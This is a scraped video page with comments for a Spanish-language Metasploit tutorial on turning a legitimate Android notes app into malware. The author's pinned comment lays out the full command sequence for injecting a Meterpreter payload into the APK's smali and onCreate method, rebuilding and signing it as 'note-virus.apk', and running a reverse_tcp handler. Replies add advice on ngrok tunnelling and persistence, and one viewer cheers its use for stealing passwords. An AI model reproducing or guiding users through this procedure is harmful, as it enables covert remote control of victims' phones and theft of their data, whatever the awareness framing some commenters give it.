Así crean los hacker aplicaciones maliciosas | Metasploit

  Рет қаралды 4,877

MIDESMIS

MIDESMIS

Күн бұрын

Пікірлер: 70
@midesmis
@midesmis Жыл бұрын
Por aca le dejo escrito los comandos: ---------------------------------------------------------- - descargamos el apktool desde github: github.com/iBotPeaches/Apktool/releases/tag/v2.9.2 - para ejecutar es: java -jar la ruta del apktool.jar - ingresamos al smali de la apk maliciosa y lo descomprimimos dentro de la carpeta de la app que vamos a infectar usando tar tar -cf - ./smali | (cd ../notas; tar -xpf - ) - buscamos dentro de android manifest la ruta de MAIN grep -B2 "MAIN" AndroidManifest.xml - buscamos el archivo onCreate y le redirigimos a nuestro pyload dentro de metasploit le copiamos lo siguiente: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - ahora pasamos a revisar los permisos de la aplicacion infectada cat AndroidManifest.xml | grep "uses-permission - luego creamos el apk nuevamente java -jar ../../apktool_2.9.2.jar b notas -o note-virus.apk - si presenta error corremos lo siguiente java -jar ../../apktool_2.9.2.jar apktool empty-framework-dir --force - firmamos la apk keytool -genkey -v -keystore notes.keystore -alias notes -keyalg RSA -keysize 2048 -validity 10000 - luego usamos jarsigner si no esta instalados corremos el siguiente comando para instalar: apt-get install openjdk-11-jdk-headless luego ejecutamos los siguiente para ejecutar el firmado: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore notes.keystore note-virus.apk notes - levantamos metasploit msfdb run use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4646 exploit
@maximartiarena9866
@maximartiarena9866 10 ай бұрын
Me pasarias la apk que usaste? descarge muchas, pero no me dan confianza para realizar esta prueba.
@midesmis
@midesmis 10 ай бұрын
@@maximartiarena9866 tendría que buscarla xq la eliminé pero puedes descargar cualquiera apk de la página que eso en el video para la descarga
@mariopalaciosrendon9959
@mariopalaciosrendon9959 9 ай бұрын
@hectorrodriguez2736
@hectorrodriguez2736 Ай бұрын
necesitamos mas creadores de contenido asi, que enseñan la realidad para concientizar a los usuarios.
@alvarobalada6528
@alvarobalada6528 Жыл бұрын
Este video demuestra que hay que pensar dos veces antes de descargarse una APK modificada! Muy buen video amigo!
@midesmis
@midesmis Жыл бұрын
Así es amigo, la gente descarga y instala app sin analizar las consecuencias
@maximartiarena9866
@maximartiarena9866 10 ай бұрын
Amigo. te pasaste. me diste ideas para proteger mi celular y a mi gente. Usen siempre las herramientas con hética muchachos.
@saulgarciaarroyo4035
@saulgarciaarroyo4035 9 ай бұрын
¡¡Excelente video amigo!! Buena explicación
@midesmis
@midesmis 9 ай бұрын
Gracias bro y bienvenido a la comunidad
@exequielo
@exequielo 9 ай бұрын
Usando todo esté conocimiento podríamos revisar apks y ver en su código si existen archivos maliciosos y así prevenirno y parchar la amenaza....
@midesmis
@midesmis 9 ай бұрын
Claro sería lo ideal, estaría bueno revisar.
@diaverso5794
@diaverso5794 6 ай бұрын
Cuando intento instalar la aplicacion modificada, me sale el mensaje de "La aplicacion no se ah instalado, porque parece que el paquete no es valido" Pero la original si que se instala
@esbiblico
@esbiblico 12 күн бұрын
Esto se puede hacer desde un vps o maquina virtual para no exponernos tanto?. Solo debo descargar aplicaciones desde la PlayStore?
@Python_12_Official
@Python_12_Official 2 ай бұрын
Deberías crear un curso completo de hacking android desde cero
@midesmis
@midesmis 2 ай бұрын
Eso va poco a poco, ahora estoy creando un proyecto llamado Hacker game pronto lo subiré al canal
@pwd_hack
@pwd_hack 5 ай бұрын
Buen video, sigue asi. Sensei.
@midesmis
@midesmis 5 ай бұрын
Gracias bro por ahí voy a tratar de hacer algún otro video sobre hacking en Android
@World_Football_Siu7
@World_Football_Siu7 6 ай бұрын
Muy bien vídeo, podrías hacer uno en dónde modifiques la APK pero en este caso para que un bot envíe información telegram.
@officialkiller-bk8sj
@officialkiller-bk8sj 7 ай бұрын
Calcado el video de savitar jajajaa Buen video
@midesmis
@midesmis 7 ай бұрын
Gran maestro el savitar se aprende bastante de él
@claudiolujan468
@claudiolujan468 8 ай бұрын
Gracias capo segui asi
@jdct
@jdct 10 ай бұрын
Buen video Bro, tengo una pregunta, cada vez que quiera acceder al dispositivo android desde metasploit, tengo que poner los datos del lport y todo eso de nuevo, y me saldrá el dispositivo que está infectado? O solo funciona una sola vez?
@midesmis
@midesmis 10 ай бұрын
Así es bro siempre que quieres ingresar debes apuntar el metasploit al dispositivo.
@taniacotrofepeteira5969
@taniacotrofepeteira5969 6 ай бұрын
Esto es perfecto para infectar un despositivo y sacar sus claves
@retr0.1Axxo
@retr0.1Axxo 8 ай бұрын
tengo un problema me sale este error al crear el meta [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload Error: One or more options failed to validate: LHOST.
@midesmis
@midesmis 8 ай бұрын
Son varias cosas, válida que estas colocando correctamente el módulo que necesitas y el puerto, que versión de Kali Linux estás usando ?
@PsYxD
@PsYxD Жыл бұрын
dudas...en ngrok tiene que ser el puerto 4646? porque no me conecta ese puerto,lo tengo que abrir yo ewn el router?, si me aclaras eso mejor. Con otros puertos si va pero el 4646 no establece conexion
@midesmis
@midesmis Жыл бұрын
Puedes colocar cualquier puerto la verdad, solo mantén la sesión de Ngrok abierta durante todo el proceso.
@PsYxD
@PsYxD Жыл бұрын
@@midesmis ah perfecto, es que justo ese puerto me daba error, con otros si me va , gracias
@m01jaron84
@m01jaron84 3 ай бұрын
Bro tengo una pregunta, estoy intentando activar el puerto tcp con ngrok pero me dice que es de paga la función de iniciar túneles tcp. Que hago o que otra opción tengo? Deberías de actualizar este video porfavor respóndeme 🙏
@midesmis
@midesmis 3 ай бұрын
Que tal bro casualmente estoy en eso, estoy preparando la actualización de este contenido con nuevas herramientas y formas de hacer las pruebas
@m01jaron84
@m01jaron84 3 ай бұрын
@@midesmis excelente hermano, estaré en espera de ese videaso
@Cronicas-biblica
@Cronicas-biblica 8 ай бұрын
Hola amogo quiero modificar una apk que quiero utilizar pero le pase por virus total y me sale que esta infectada y permisos fuera de lo que se necesita como lo hago
@midesmis
@midesmis 8 ай бұрын
Lo que sucede es que la seguridad de las aplicaciones ha mejorado mucho hoy en día, estas técnicas toca refinarlas para que sean más efectivas, te toca sentarte a investigar y aprender cómo refinar el proceso
@midesmis
@midesmis 8 ай бұрын
Este mundo de la ciberseguridad es un cambio constante lo de ayer no quiere decir que funcione hoy
@nero98x
@nero98x 2 ай бұрын
holaaa, emm xd tengo un problema, es que cuando voy a instalar la app, me dice "la aplicación no fue instalada porque el paquete no parece ser valido", q hago ahí? xd...
@midesmis
@midesmis 2 ай бұрын
Bueno pueden ser muchos factores una respuesta exacta no la tengo te diría que lo hagas con calma y paso a paso, pronto voy a sacar una versión actualizada de este tutorial pero mientras sigue practicando
@nero98x
@nero98x 2 ай бұрын
@midesmis muchas gracias :D, otra pregunta, esto solo funciona con versiones de Android anteriores al 10?, o también se puede aplicar sobre Android 11 y 12?
@midesmis
@midesmis 2 ай бұрын
Android se ha actualizado mucho, en este caso puedes usar cualquier apk sin embargo las nuevas versiones detectan casi instantáneamente las apk maliciosas toca jugársela mucho para que se haga la instalación y se acceda a los permisos necesarios de la apk
@nero98x
@nero98x 2 ай бұрын
@@midesmis intentaré desde mi dispositivo android, creo que tiene android 12, aunque actualmente se maneja mejor con python y cali linux...
@midesmis
@midesmis 2 ай бұрын
Dale bro entre más práctica mejor
@Prepers25
@Prepers25 11 ай бұрын
Tengo un problema en el minuto 15 cuando tu vas a modificar el archivo android manifestó. Xml a mi no me aparece eso q tu ibas a modificar no me sale y no se q aser
@midesmis
@midesmis 10 ай бұрын
Bueno eso que me comentas es interesante te sabes que voy a hacer una comunidad en discord y nos ayudamos a resolver estos problemas, te sumas?
@kang6596
@kang6596 5 ай бұрын
Ya lo solucionaste? me pasa lo mismo
@kang6596
@kang6596 5 ай бұрын
@@midesmis bro tengo el mismo error, una solucion? ya he probado con varias apks y lo mismo
@midesmis
@midesmis 4 ай бұрын
@@kang6596 unanse al canal de telegram youtube ya me a bajado varios vídeos por allá subiré videos de Ciberseguridad
@alcasec01H1
@alcasec01H1 8 ай бұрын
Bro como ago persistencia de la aplicación para que no falle la conexión nuevamente o que la aplicación tenga que estar abierta para acceder otra vez
@midesmis
@midesmis 8 ай бұрын
La aplicación al final del día es una ventana, tendrías que escalar privilegios para tomar control total del dispositivo.
@GeynerPena
@GeynerPena 22 күн бұрын
Bro es para Android y Apple
@fabriciozetaquiroga7912
@fabriciozetaquiroga7912 4 ай бұрын
bro y para meter virus a una aplicacion exe?
@midesmis
@midesmis 3 ай бұрын
Portate bien jajaja 😂
@manuelantoniorodriguezmosc4564
@manuelantoniorodriguezmosc4564 2 ай бұрын
Puedo preguntarte eres de Perú
@midesmis
@midesmis 2 ай бұрын
Que tal bro jajaa no bro soy de Panamá
@renatoescobar6332
@renatoescobar6332 3 ай бұрын
Es necesario usar el ngrok?
@midesmis
@midesmis 2 ай бұрын
Depende si puedes crear un túnel que permita la conexión con alguna otra herramienta también es válido lo importante es poder crear la comunicación
@renatoescobar6332
@renatoescobar6332 2 ай бұрын
@@midesmis excelente, gracias, podrias compartirnos el apk que tu usas en el video por favor? Gracias.
@midesmis
@midesmis 2 ай бұрын
@@renatoescobar6332 bueno esa apk la tomé por tomar no se si aún exista, puedes tomar cualquier apk y hacerle la ingeniería inversa, si sigues los pasos te va a funcionar
@elisabethrosaHernandezmosquera
@elisabethrosaHernandezmosquera 3 ай бұрын
En celular como se hace
@midesmis
@midesmis 3 ай бұрын
Jajaja portate bien Elisabeth 😅
@AlmaDeportiva
@AlmaDeportiva 9 ай бұрын
Bro donde consigo una mentoria contigo ?
@midesmis
@midesmis 9 ай бұрын
Aquí mismo bro deja la pregunta y se te puedo ayudar te ayudo, yo la verdad aún no me considero experto así que no pasa nada ya más adelante si vamos mejorando bueno hacemos mentiría privada pero por ahora deja tu pregunta bro con confianza
@taniacotrofepeteira5969
@taniacotrofepeteira5969 5 ай бұрын
@@midesmis donde aprendiste a hackear?
@midesmis
@midesmis 5 ай бұрын
@@taniacotrofepeteira5969 empecé por aquí por youtube y después leyendo y investigando todo lo que puedo, aún sigo aprendiendo la verdad
@JoseFernandez-lw8wk
@JoseFernandez-lw8wk 5 ай бұрын
El apk que usaste no encontré
@midesmis
@midesmis 5 ай бұрын
Puedes usar cualquier otra bro
@JoseFernandez-lw8wk
@JoseFernandez-lw8wk 5 ай бұрын
Mensajes liminales jajjaja al abrir la terminal
@claudiolujan468
@claudiolujan468 8 ай бұрын
Tengo un problema crack me aparece esto que puede ser? java -jar apktool_2.9.2.jar b com.notas.controlador_2021-06-21.apk~/s/downloads fish: Job 1, 'java -jar apktool_2.9.2.jar b c…' terminated by signal SIGSYS (Bad system call)
@midesmis
@midesmis 8 ай бұрын
Este problema puede ser por que la apk tiene un error de compatibilidad con el jar, te toca hacer la tarea de investigar ya que esto así a simple vista no es fácil de responder
Lo que no te cuentan los Youtubers de las VPN [CYBERGHOST VPN]
11:53
Lord Draugr
Рет қаралды 1,1 МЛН
My scorpion was taken away from me 😢
00:55
TyphoonFast 5
Рет қаралды 2,7 МЛН
Descubre cómo recopilar toda la Información de Alguien...
13:24
David Pereira
Рет қаралды 45 М.
Metasploit Payloads Ahora en Termux: ¡Hackea Tu Android!
13:40
Tech Genius
Рет қаралды 2,8 М.
¿Cómo Funciona un Crack?
12:04
Migma
Рет қаралды 440 М.
Путин ответил на ультиматум Трампа
7:25
Diplomatrutube
Рет қаралды 2,1 МЛН
Metasploit For Beginners to Expert   The Basics Modules, Exploits And Payloads
2:00:03
Cyber Technical knowledge
Рет қаралды 3,6 М.
CONTROL REMOTO a CUALQUIER PC con DISCORD
22:13
Roger Biderbost
Рет қаралды 72 М.
RTX 5090: La gráfica MÁS POTENTE del mundo
17:43
Nate Gentile
Рет қаралды 331 М.
Metasploit | Explotación de vulnerabilidades
57:36
SEGURIDAD CERO
Рет қаралды 20 М.